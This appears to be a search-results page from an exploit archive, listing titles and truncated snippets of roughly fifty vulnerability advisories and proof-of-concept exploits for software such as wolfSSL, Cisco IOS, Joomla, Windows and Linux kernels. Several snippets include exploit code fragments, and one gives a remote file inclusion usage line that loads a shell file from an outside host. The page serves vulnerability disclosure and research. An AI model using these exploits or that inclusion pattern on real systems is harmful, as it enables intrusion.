41207 matches found
wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One
wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One TALOS-2017-0293 WOLFSSL LIBRARY X509 CERTIFICATE TEXT PARSING CODE EXECUTION VULNERABILITY MAY 8, 2017 CVE-2017-2800 SUMMARY An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL...
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory !/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6...
dotCMS 3.6.1 - Blind Boolean SQL Injection
dotCMS 3.6.1 - Blind Boolean SQL Injection : ' Blind Boolean SQL Injection in dotCMS = 3.6.1 CVE-2017-5344 Product Description dotCMS is a scalable, java based, open source content management system CMS that has been designed to manage and deliver personalized, permission based content experience...
Microsoft Windows Kernel - win32k.sys Local Privilege Escalation (MS14-058)
Microsoft Windows Kernel - win32k.sys Local Privilege Escalation MS14-058 Sources: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf https://github.com/sam-b/CVE-2014-4113 EDB Mirror:...
Orchard CMS 1.7.31.8.21.9.0 - Persistent Cross-Site Scripting
Orchard CMS 1.7.31.8.21.9.0 - Persistent Cross-Site Scripting ----------------- Background ----------------- Orchard is a free, open source, community-focused content management system written in ASP.NET platform using the ASP.NET MVC framework. Its vision is to create shared components for...
IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution
IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution !/usr/bin/python import BaseHTTPServer, socket IBM Security AppScan Standard OLE Automation Array Remote Code Execution Author: Naser Farhadi Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 Date: 1 June...
Sendio ESP - Information Disclosure
Sendio ESP - Information Disclosure 1. Advisory Information Title: Sendio ESP Information Disclosure Vulnerability Advisory ID: CORE-2015-0010 Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability Date published: 2015-05-22 Date of last update:...
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
Persistent Systems Client Automation - Command Injection Remote Code Execution Metasploit Exploit Title: Persistent Systems Client Automation PSCA, formerly HPCA or Radia Command Injection Remote Code Execution Vulnerability Date: 2014-10-01 Exploit Author: Ben Turner Vendor Homepage: Previosuly...
AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation
AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation / Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.avg.com/ Tested Version - 2015.0.5315 Driver...
Microsoft-Office-2007-and-2010---OLE-Arbitrary-Command-Execution
CVE-2014-6352 OLE Remote Code Execution Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Tested on win7 - office 2007 and 2010...
Enalean Tuleap 7.2 - XML External Entity File Disclosure
Enalean Tuleap 7.2 - XML External Entity File Disclosure Vulnerability title: Tuleap = 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XM...
Vivotek IP Cameras - Multiple Vulnerabilities
Vivotek IP Cameras - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com Vivotek IP Cameras Multiple Vulnerabilities 1. Advisory Information Title: Vivotek IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0301 Advisory URL:...
Joomla! 3.0.2 - highlight.php PHP Object Injection
Joomla! 3.0.2 - highlight.php PHP Object Injection ------------------------------------------------------------------- Joomla! request-get'highlight', null, 'base64'; 58. $terms = $terms ? unserializebase64decode$terms : null; User input passed through the "highlight" parameter is not properly...
Konqueror 4.7.3 - Memory Corruption
Konqueror 4.7.3 - Memory Corruption -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Nth Dimension Security Advisory NDSA20121010 Date: 10th October 2012 Author: Tim Brown URL: / Product: Konqueror 4.7.3 Vendor: KDE Risk: Medium Summary The Konqueror web browser is vulnerable to a number of memory...
Guru JustAnswer Professional 1.25 - Multiple SQL Injections
Guru JustAnswer Professional 1.25 - Multiple SQL Injections / / / \ \ \ \ \ / / \\ \ \ \ \ // /// \ \ / / \ //|\ / \ \ \ \ \ \ / / \ \ / / \ | | | \ | | || | | |/ / \ V / || |\ V / / \ | / \ | /| | | || / | | | | . | ' || / | || // \ // \|||/|||||||||\ .WEB.ID...
PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service
PHP 5.3.6 - shmopread Integer Overflow Denial of Service...
Microsoft Windows - NTLM Weak Nonce (MS10-012)
Microsoft Windows - NTLM Weak Nonce MS10-012 Windows SMB NTLM Authentication Weak Nonce Vulnerability Security Advisory Hernan Ochoa [email protected] - Agustin Azubel [email protected] Title: Windows SMB NTLM Authentication Weak Nonce Vulnerability Advisory ID: OCHOA-2010-0209...
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)
Microsoft Office - HtmlDlgHelper Class Memory Corruption MS10-071 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com Microsoft Office HtmlDlgHelper class memory corruption 1. Advisory Information Title: Microsoft Office HtmlDlgHelper class memory corruption Advisory I...
Orbital Viewer 1.04 - .orb File Local Universal Overflow (SEH)
Orbital Viewer 1.04 - .orb File Local Universal Overflow SEH !/usr/bin/python Orbital Viewer v1.04 .orb 0day Local Universal SEH Overflow Exploit Date: 27 Feb 2010 CVE: CVE-2010-0688 Download: http://www.orbitals.com/orb/ov.htm Found & exploited by: mrme http://net-ninja.net Greetz to:...
list Web - addlink.php?id SQL Injection
list Web - addlink.php?id SQL Injection | | list Web addlink.php id Remote SQL Injection Vulnerability | | |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | | script : http://maker.ir | | DorK :...
Web Directory PRO - Admins.php Change Admin Password
Web Directory PRO - Admins.php Change Admin Password change password Web Directory PRO MODIFY Login Password TypeSubadminAdmin Categories ArtBusinessComputersGamesHealth & FitnessNewsSportsRecreationInternetTeen & KidsReferenceEducationRegionalSocietyScienceHome & FamilyWorldShoppingWeb...
vSpin Classified System 2004 - cat.asp?cat SQL Injection
vSpin Classified System 2004 - cat.asp?cat SQL Injection source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently...
Les Visiteurs (Visitors) 2.0 - config.inc.php File Inclusion
Les Visiteurs Visitors 2.0 - config.inc.php File Inclusion ============================================================================================== lesvisit visiteurs = v2.0 lvcincludedir Remote File Include Vulnerability...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access
phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific...
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection Google Dork: intext:"© GUnet 2003-2007" Date: 2020-03-02 Exploit Author: emaragkos Vendor Homepage: https://www.openeclass.org/ Software Link:...
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting Author Information Author : Ahmed Elhady Mohamed twitter : @AhmedELhady Date : 01/07/2018 Software Information Affected Software : SeoChecker Umbraco CMS Plug-in Version: version 1.9.2 Software website :...
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution 46.0.1 -- CVE-2016-1960 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x20200000 / target...
Joomla! Component PrayerCenter 3.0.2 - sessionid SQL Injection
Joomla! Component PrayerCenter 3.0.2 - sessionid SQL Injection Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: http://www.mlwebtechnologies.com/ Software Link:...
Linux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free
Linux Kernel 4.10.5 4.14.3 Ubuntu - DCCP Socket Use-After-Free / This is an announcement for CVE-2017-8824 which is a use-after-free vulnerability I found in Linux DCCP socket. It can be used to gain kernel code execution from unprivileged processes. You’ll find in attachment the proof of concept...
Linux Kernel - offset2lib Stack Clash
Linux Kernel - offset2lib Stack Clash / Linuxoffset2lib.c for CVE-2017-1000370 and CVE-2017-1000371 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation,...
Ansible 2.1.42.2.1 - Command Execution
Ansible 2.1.42.2.1 - Command Execution Computest security advisory CT-2017-0109 Summary: Command execution on Ansible controller from host Affected software: Ansible CVE: CVE-2016-9587 Reference URL: https://www.computest.nl/advisories/ CT-2017-0109Ansible.txt Affected versions: 2.1.4, 2.2.1...
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting !/usr/bin/ruby =begin ------------------------------------------------------------------------ Product: Palo Alto Traps Server formerly Cyvera Endpoint Protection Vendor: Palo Alto Networks Vulnerable Versions: 3.1.2.1546 Tested...
OXID eShop 4.7.115.0.11 4.8.45.1.4 - Multiple Vulnerabilities
OXID eShop 4.7.115.0.11 4.8.45.1.4 - Multiple Vulnerabilities Exploit Title: OXID eShop v4.7.11/5.0.11 + v4.8.4/5.1.4 Multiple Vulnerabilities Google Dork: - Date: 12/2013 Exploit Author: //sToRm Author mail: [email protected] Vendor Homepage: http://www.oxid-esales.com Software Link: -...
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution Title: MongoDB nativeHelper.apply Remote Code Execution Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/ Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz Version: 2.2.3 The following PoC...
phpMyBitTorrent 2.04 - Multiple Vulnerabilities
phpMyBitTorrent 2.04 - Multiple Vulnerabilities waraxe-2012-SA091 - Multiple Vulnerabilities in phpMyBitTorrent 2.04 =============================================================================== Author: Janek Vind "waraxe" Date: 01. October 2012 Location: Estonia, Tartu Web:...
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service From: http://jon.oberheide.org/files/sctp-boom.py !/usr/bin/env python ''' sctp-boom.py Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 The sctpprocessunkparam function in...
WeBProdZ CMS - SQL Injection
WeBProdZ CMS - SQL Injection | \ | | | | | |/ / | | | | | // \ \ / / | | | | | | |/ | ' \ | |\ \ /\ V / | | || | || | | | | | | \| / /||,|||/|| || | | | || | | | | |/' || || | | |/ / | ' \ | /| |\ | | | / | | | | | | | \ |/ /./ / /|,|| || || / / $ Exploit Title : WeBProdZ CMS SQL...
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)
Apple Mac OSX 10.6 - HFS FileSystem Denial of Service // -----BEGIN PGP SIGNED MESSAGE----- // Hash: SHA1 / Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack Denial of Service by Maksymilian Arciemowicz from SecurityReason.com...
VP-ASP Shopping Cart 7.0 - Database Disclosure
VP-ASP Shopping Cart 7.0 - Database Disclosure ======================================================================================== | Title : VP-ASP Shopping Cart 7.0 DB Download Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi ...
SeaMonkey 1.1.8 - Remote Array Overrun
SeaMonkey 1.1.8 - Remote Array Overrun From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SeaMonkey 1.1.8 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis...
Linux Kernel 2.42.6 (RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4) - sock_sendpage() Ring0 Privilege Escalation (5)
Linux Kernel 2.42.6 RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4 - socksendpage Ring0 Privilege Escalation 5 / 0x82-CVE-2009-2692 Linux kernel 2.4/2.6 32bit socksendpage local ring0 root exploit simple ver Tested RedHat Linux 9.0, Fedora core 411, Whitebox 4, CentOS 4.x. -- Discovered by...
PHPNews 0.93 - format_menue Remote File Inclusion
PHPNews 0.93 - formatmenue Remote File Inclusion ?????????? ??????????????? ??????????????????? ??????????????????????? ?????????????????????????? ?????????????????????????????? ????????????????????????????????? ??????????????????????????????????? ?????????????????????????????????????...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Auction 1.3m - phpbb_root_path Remote File Inclusion
Auction 1.3m - phpbbrootpath Remote File Inclusion !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd...
KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing
KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing source: https://www.securityfocus.com/bid/13085/info A remote email message content spoofing vulnerability affects KDE KMail. This issue is due to a failure of the application to properly sanitize HTML email messages. An attacker may...
Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution
Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution source: https://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php...
Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery Add User Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery Add User Date: 2020-01-30 Vendor Homepage: https://www.themeum.com/product/tutor-lms/ Vendor Changelog: https://wordpress.org/plugins/tutor/developer...
Core FTP LE 2.2 - Denial of Service (PoC)
Core FTP LE 2.2 - Denial of Service PoC Exploit Title: Core FTP LE 2.2 - Denial of Service PoC Date: 2020-25-02 Exploit Author: Ismael Nava Vendor Homepage: http://www.coreftp.com/ Software Link: http://www.coreftp.com/download.html Version: 2.2 build 1947 Tested on: Windows 10 Home x64 CVE : n/a...